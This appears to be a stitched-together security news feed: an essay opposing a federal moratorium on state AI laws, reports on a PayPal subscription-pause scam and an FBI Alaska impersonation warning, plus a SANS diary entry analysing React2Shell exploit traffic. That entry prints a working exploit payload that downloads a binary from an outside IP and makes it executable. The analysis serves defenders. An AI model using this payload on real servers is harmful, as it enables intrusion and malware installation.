The petition shows that hundreds of thousands of people feel the current Act tilts too far, creating unnecessary risks for free expression and ordinary online life. With sensible adjustments, Parliament can restore confidence that online safety and freedom of expression rights can coexist.
If the UK really wants to achieve its goal of being the safest place in the world to go online, it must lead the way in introducing policies that actually protect all users—including children—rather than pushing the enforcement of legislation that harms the very people it was meant to protect.
Read the briefing in full here.

Cast your mind back to May of this year: Congress was in the throes of debate over the massive budget bill. Amidst the many seismic provisions, Senator Ted Cruz dropped a ticking time bomb of tech policy: a ten-year moratorium on the ability of states to regulate artificial intelligence. To many, this was catastrophic. The few massive AI companies seem to be swallowing our economy whole: their energy demands are overriding household needs, their data demands are overriding creators’ copyright, and their products are triggering mass unemployment as well as new types of clinical psychoses. In a moment where Congress is seemingly unable to act to pass any meaningful consumer protections or market regulations, why would we hamstring the one entity evidently capable of doing so—the states? States that have already enacted consumer protections and other AI regulations, like California, and those actively debating them, like Massachusetts, were alarmed. Seventeen Republican governors wrote a letter decrying the idea, and it was ultimately killed in a rare vote of bipartisan near-unanimity.
The idea is back. Before Thanksgiving, a House Republican leader suggested they might slip it into the annual defense spending bill. Then, a draft document leaked outlining the Trump administration’s intent to enforce the state regulatory ban through executive powers. An outpouring of opposition (including from some Republican state leaders) beat back that notion for a few weeks, but on Monday, Trump posted on social media that the promised Executive Order is indeed coming soon. That would put a growing cohort of states, including California and New York, as well as Republican strongholds like Utah and Texas, in jeopardy.
The constellation of motivations behind this proposal is clear: conservative ideology, cash, and China.
The intellectual argument in favor of the moratorium is that “freedom“-killing state regulation on AI would create a patchwork that would be difficult for AI companies to comply with, which would slow the pace of innovation needed to win an AI arms race with China. AI companies and their investors have been aggressively peddling this narrative for years now, and are increasingly backing it with exorbitant lobbying dollars. It’s a handy argument, useful not only to kill regulatory constraints, but also—companies hope—to win federal bailouts and energy subsidies.
Citizens should parse that argument from their own point of view, not Big Tech’s. Preventing states from regulating AI means that those companies get to tell Washington what they want, but your state representatives are powerless to represent your own interests. Which freedom is more important to you: the freedom for a few near-monopolies to profit from AI, or the freedom for you and your neighbors to demand protections from its abuses?
There is an element of this that is more partisan than ideological. Vice President J.D. Vance argued that federal preemption is needed to prevent “progressive” states from controlling AI’s future. This is an indicator of creeping polarization, where Democrats decry the monopolism, bias, and harms attendant to corporate AI and Republicans reflexively take the opposite side. It doesn’t help that some in the parties also have direct financial interests in the AI supply chain.
But this does not need to be a partisan wedge issue: both Democrats and Republicans have strong reasons to support state-level AI legislation. Everyone shares an interest in protecting consumers from harm created by Big Tech companies. In leading the charge to kill Cruz’s initial AI moratorium proposal, Republican Senator Masha Blackburn explained that “This provision could allow Big Tech to continue to exploit kids, creators, and conservatives? we can’t block states from making laws that protect their citizens.” More recently, Florida Governor Ron DeSantis wants to regulate AI in his state.
The often-heard complaint that it is hard to comply with a patchwork of state regulations rings hollow. Pretty much every other consumer-facing industry has managed to deal with local regulation—automobiles, children’s toys, food, and drugs—and those regulations have been effective consumer protections. The AI industry includes some of the most valuable companies globally and has demonstrated the ability to comply with differing regulations around the world, including the EU’s AI and data privacy regulations, substantially more onerous than those so far adopted by US states. If we can’t leverage state regulatory power to shape the AI industry, to what industry could it possibly apply?
The regulatory superpower that states have here is not size and force, but rather speed and locality. We need the “laboratories of democracy” to experiment with different types of regulation that fit the specific needs and interests of their constituents and evolve responsively to the concerns they raise, especially in such a consequential and rapidly changing area such as AI.
We should embrace the ability of regulation to be a driver—not a limiter—of innovation. Regulations don’t restrict companies from building better products or making more profit; they help channel that innovation in specific ways that protect the public interest. Drug safety regulations don’t prevent pharma companies from inventing drugs; they force them to invent drugs that are safe and efficacious. States can direct private innovation to serve the public.
But, most importantly, regulations are needed to prevent the most dangerous impact of AI today: the concentration of power associated with trillion-dollar AI companies and the power-amplifying technologies they are producing. We outline the specific ways that the use of AI in governance can disrupt existing balances of power, and how to steer those applications towards more equitable balances, in our new book, Rewiring Democracy. In the nearly complete absence of Congressional action on AI over the years, it has swept the world’s attention; it has become clear that states are the only effective policy levers we have against that concentration of power.
Instead of impeding states from regulating AI, the federal government should support them to drive AI innovation. If proponents of a moratorium worry that the private sector won’t deliver what they think is needed to compete in the new global economy, then we should engage government to help generate AI innovations that serve the public and solve the problems most important to people. Following the lead of countries like Switzerland, France, and Singapore, the US could invest in developing and deploying AI models designed as public goods: transparent, open, and useful for tasks in public administration and governance.
Maybe you don’t trust the federal government to build or operate an AI tool that acts in the public interest? We don’t either. States are a much better place for this innovation to happen because they are closer to the people, they are charged with delivering most government services, they are better aligned with local political sentiments, and they have achieved greater trust. They’re where we can test, iterate, compare, and contrast regulatory approaches that could inform eventual and better federal policy. And, while the costs of training and operating performance AI tools like large language models have declined precipitously, the federal government can play a valuable role here in funding cash-strapped states to lead this kind of innovation.
This essay was written with Nathan E. Sanders, and originally appeared in Gizmodo.
EDITED TO ADD: Trump signed an executive order banning state-level AI regulations hours after this was published. This is not going to be the last word on the subject.
After an investigation by BleepingComputer, PayPal closed a loophole that allowed scammers to send emails from the legitimate service@paypal.com email address.
Following reports from people who received emails claiming an automatic payment had been cancelled, BleepingComputer found that cybercriminals were abusing a PayPal feature that allows merchants to pause a customer’s subscription.
The scammers created a PayPal subscription and then paused it, which triggers PayPal’s genuine “Your automatic payment is no longer active” notification to the subscriber. They also set up a fake subscriber account, likely a Google Workspace mailing list, which automatically forwards any email it receives to all other group members.
This allowed the criminals to use a similar method to one we’ve described before, but this time with the legitimate service@paypal.com address as the sender, bypassing email filters and a first casual check by the recipient.

“Your automatic payment is no longer active
You’ll need to contact Sony U.S.A. for more details or to reactivate your automatic payments. Here are the details:”
BleepingComputer says there are slight variations in formating and phone numbers to call, but in essence they are all based on this method.
To create urgency, the scammers made the emails look as though the target had been charged for some high-end, expensive device. They also added a fake “PayPal Support” phone number, encouraging targets to call in case if they wanted to cancel the payment of had questions
In this type of tech support scam, the target calls the listed number, and the “support agent” on the other end asks to remotely log in to their computer to check for supposed viruses. They might run a short program to open command prompts and folders, just to scare and distract the victim. Then they’ll ask to install another tool to “fix” things, which will search the computer for anything they can turn into money. Others will sell you fake protection software and bill you for their services. Either way, the result is the same: the victim loses money.
PayPal contacted BleepingComputer to let them know they were closing the loophole:
“We are actively mitigating this matter, and encourage people to always be vigilant online and mindful of unexpected messages. If customers suspect they are a target of a scam, we recommend they contact Customer Support directly through the PayPal app or our Contact page for assistance.”
The best way to stay safe is to stay informed about the tricks scammers use. Learn to spot the red flags that almost always give away scams and phishing emails, and remember:
If you’ve already fallen victim to a tech support scam:
Pro tip: Malwarebytes Scam Guard recognized this email as a scam. Upload any suspicious text, emails, attachments and other files to ask for its opinion. It’s really very good at recognizing scams. Here’s what it reported back for this particular scam:

“Suspicious Email Assessment
This email appears to be a phishing attempt designed to trick you into contacting scammers via a fake customer service number, a suspicious website, or email address. Here’s a breakdown of key warning signs:
Red Flags Detected
- Fake or Spoofed Sender Address
- While it says “service@paypal.com”, sender addresses can be easily spoofed. The real test is the content and behavior of the message, not just the visible address.
- Suspicious URLs
- Links like http://sonyusa.store and [sonyusa.store] (both non-official and unrelated to PayPal or Sony).
- Official PayPal links always use paypal.com domain.
- Non-Official Customer Service Email
- Email provided is sony12service@gmail.com instead of an official Sony or PayPal domain.
- Urgency and Threat of Unauthorized Charges
- Creates panic by telling you a large payment was processed and prompts you to act quickly by contacting their “support” number or email.
- Phone Number Trap
- The number provided (805-500-6377) is likely operated by scammers. Real PayPal will never ask you to contact them via generic phone numbers outside of their secure website.
- Unusual Formatting and Grammar
- Awkward phrasing and formatting errors are common in scams.”
We don’t just report on scams—we help detect them
Cybersecurity risks should never spread beyond a headline. If something looks dodgy to you, check if it’s a scam using Malwarebytes Scam Guard, a feature of our mobile protection products. Submit a screenshot, paste suspicious content, or share a text or phone number, and we’ll tell you if it’s a scam or legit. Download Malwarebytes Mobile Security for iOS or Android and try it today!
Exploits for React2Shell (CVE-2025-55182) remain active. However, at this point, I would think that any servers vulnerable to the "plain" exploit attempts have already been exploited several times. Here is today's most popular exploit payload:
------WebKitFormBoundaryxtherespoopalloverme
Content-Disposition: form-data; name="0"
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('http').get('http://51.81.104.115/nuts/poop',r=>r.pipe(process.mainModule.require('fs').createWriteStream('/dev/shm/lrt').on('finish',()=>process.mainModule.require('fs').chmodSync('/dev/shm/lrt',0o755))));","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryxtherespoopalloverme
Content-Disposition: form-data; name="1"
"$@0"
------WebKitFormBoundaryxtherespoopalloverme
------WebKitFormBoundaryxtherespoopalloverme--
To make the key components more readable:
process.mainModule.require('http').get('http://51.81.104.115/nuts/poop',
r=>r.pipe(process.mainModule.require('fs').
createWriteStream('/dev/shm/lrt').on('finish'
This statement downloads the binary from 51.81.104.115 into a local file, /dev/shm/lrt.
process.mainModule.require('fs').chmodSync('/dev/shm/lrt',0o755))));
And then the script is marked as executable. It is unclear whether the script is explicitly executed. The Virustotal summary is somewhat ambiguous regarding the binary, identifying it as either adware or a miner [1]. Currently, this is the most common exploit variant we see for react2shell.
Other versions of the exploit use /dev/lrt and /tmp/lrt instead of /dev/shm/lrt to store the malware.
/dev/shm and /dev/tmp are typically world writable and should always work. /dev requires root privileges, and these days it is unlikely for a web application to run as root. One recommendation to harden Linux systems is to create/tmp as its own partition and mark it as "noexec" to prevent it from being used as a scratch space to run exploit code. But this is sometimes tough to implement with "normal" processes running code in /tmp (not pretty, but done ever so often)
[1] https://www.virustotal.com/gui/file/895f8dff9cd26424b691a401c92fa7745e693275c38caf6a6aff277eadf2a70b/detection
--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|
Cast your mind back to May of this year: Congress was in the throes of debate over the massive budget bill. Amidst the many seismic provisions, Senator Ted Cruz dropped a ticking time bomb of tech policy: a ten-year moratorium on the ability of states to regulate artificial intelligence. To many, this was catastrophic. The few massive AI companies seem to be swallowing our economy whole: their energy demands are overriding household needs, their data demands are overriding creators’ copyright, and their products are triggering mass unemployment as well as new types of clinical ...
The post Against the Federal Moratorium on State-Level Regulation of AI appeared first on Security Boulevard.
This is the third installment in our four-part 2025 Year-End Roundtable. In Part One, we explored how accountability got personal. In Part Two, we examined how regulatory mandates clashed with operational complexity.
Now … (more…)
The post LW ROUNDTABLE: Part 3, Cyber resilience faltered in 2025 — recalibration now under way first appeared on The Last Watchdog.
The post LW ROUNDTABLE: Part 3, Cyber resilience faltered in 2025 — recalibration now under way appeared first on Security Boulevard.
Navigating the Most Complex Regulatory Landscapes in Cybersecurity Financial services and healthcare organizations operate under the most stringent regulatory frameworks in existence. From HIPAA and PCI-DSS to GLBA, SOX, and emerging regulations like DORA, these industries face a constant barrage of compliance requirements that demand not just checkboxes, but comprehensive, continuously monitored security programs. The
The post Compliance-Ready Cybersecurity for Finance and Healthcare: The Seceon Advantage appeared first on Seceon Inc.
The post Compliance-Ready Cybersecurity for Finance and Healthcare: The Seceon Advantage appeared first on Security Boulevard.
The cybersecurity battlefield has changed. Attackers are faster, more automated, and more persistent than ever. As businesses shift to cloud, remote work, SaaS, and distributed infrastructure, their security needs have outgrown traditional IT support. This is the turning point:Managed Service Providers (MSPs) are evolving into full-scale Managed Security Service Providers (MSSPs) – and the ones
The post Managed Security Services 2.0: How MSPs & MSSPs Can Dominate the Cybersecurity Market in 2025 appeared first on Seceon Inc.
The post Managed Security Services 2.0: How MSPs & MSSPs Can Dominate the Cybersecurity Market in 2025 appeared first on Security Boulevard.
Launching an AI initiative without a robust data strategy and governance framework is a risk many organizations underestimate. Most AI projects often stall, deliver poor...Read More
The post Can Your AI Initiative Count on Your Data Strategy and Governance? appeared first on ISHIR | Custom AI Software Development Dallas Fort-Worth Texas.
The post Can Your AI Initiative Count on Your Data Strategy and Governance? appeared first on Security Boulevard.
Learn why modern SaaS platforms are adopting passwordless authentication to improve security, user experience, and reduce breach risks.
The post Why Modern SaaS Platforms Are Switching to Passwordless Authentication appeared first on Security Boulevard.
Most enterprise breaches no longer begin with a firewall failure or a missed patch. They begin with an exposed identity. Credentials harvested from infostealers. Employee logins are sold on criminal forums. Executive personas impersonated to trigger wire fraud. Customer identities stitched together from scattered exposures. The modern breach path is identity-first — and that shift …
The post Identity Risk Is Now the Front Door to Enterprise Breaches (and How Digital Risk Protection Stops It Early) appeared first on Security Boulevard.
Join us in the midst of the holiday shopping season as we discuss a growing privacy problem: tracking pixels embedded in marketing emails. According to Proton’s latest Spam Watch 2025 report, nearly 80% of promotional emails now contain trackers that report back your email activity. We discuss how these trackers work, why they become more […]
The post The Hidden Threat in Your Holiday Emails: Tracking Pixels and Privacy Concerns appeared first on Shared Security Podcast.
The post The Hidden Threat in Your Holiday Emails: Tracking Pixels and Privacy Concerns appeared first on Security Boulevard.
![]()
The FBI Anchorage Field Office has issued a public warning after seeing a sharp increase in fraud cases targeting residents across Alaska. According to federal authorities, scammers are posing as law enforcement officers and government officials in an effort to extort money or steal sensitive personal information from unsuspecting victims.
The warning comes as reports continue to rise involving unsolicited phone calls where criminals falsely claim to represent agencies such as the FBI or other local, state, and federal law enforcement bodies operating in Alaska. These scams fall under a broader category of law enforcement impersonation scams, which rely heavily on fear, urgency, and deception.
Scammers typically contact victims using spoofed phone numbers that appear legitimate. In many cases, callers accuse individuals of failing to report for jury duty or missing a court appearance. Victims are then told that an arrest warrant has been issued in their name.
To avoid immediate arrest or legal consequences, the caller demands payment of a supposed fine. Victims are pressured to act quickly, often being told they must resolve the issue immediately. According to the FBI, these criminals may also provide fake court documents or reference personal details about the victim to make the scam appear more convincing.
In more advanced cases, scammers may use artificial intelligence tools to enhance their impersonation tactics. This includes generating realistic voices or presenting professionally formatted documents that appear to come from official government sources. These methods have contributed to the growing sophistication of government impersonation scams nationwide.
Authorities note that these scams most often occur through phone calls and emails. Criminals commonly use aggressive language and insist on speaking only with the targeted individual. Victims are often told not to discuss the call with family members, friends, banks, or law enforcement agencies.
Payment requests are another key red flag. Scammers typically demand money through methods that are difficult to trace or reverse. These include cash deposits at cryptocurrency ATMs, prepaid gift cards, wire transfers, or direct cryptocurrency payments. The FBI has emphasized that legitimate government agencies never request payment through these channels.
The FBI has reiterated that it does not call members of the public to demand payment or threaten arrest over the phone. Any call claiming otherwise should be treated as fraudulent. This clarification is a central part of the FBI’s broader FBI scam warning Alaska residents are being urged to take seriously.
Data from the FBI’s Internet Crime Complaint Center (IC3) highlights the scale of the problem. In 2024 alone, IC3 received more than 17,000 complaints related to government impersonation scams across the United States. Reported losses from these incidents exceeded $405 million nationwide.
Alaska has not been immune. Reported victim losses in the state surpassed $1.3 million, underscoring the financial and emotional impact these scams can have on individuals and families.
To reduce the risk of falling victim, the FBI urges residents to “take a beat” before responding to any unsolicited communication. Individuals should resist pressure tactics and take time to verify claims independently.
The FBI strongly advises against sharing or confirming personally identifiable information with anyone contacted unexpectedly. Alaskans are also cautioned never to send money, gift cards, cryptocurrency, or other assets in response to unsolicited demands.
Anyone who believes they may have been targeted or victimized should immediately stop communicating with the scammer. Victims should notify their financial institutions, secure their accounts, contact local law enforcement, and file a complaint with the FBI’s Internet Crime Complaint Center at www.ic3.gov. Prompt reporting can help limit losses and prevent others from being targeted.
![]()
![]()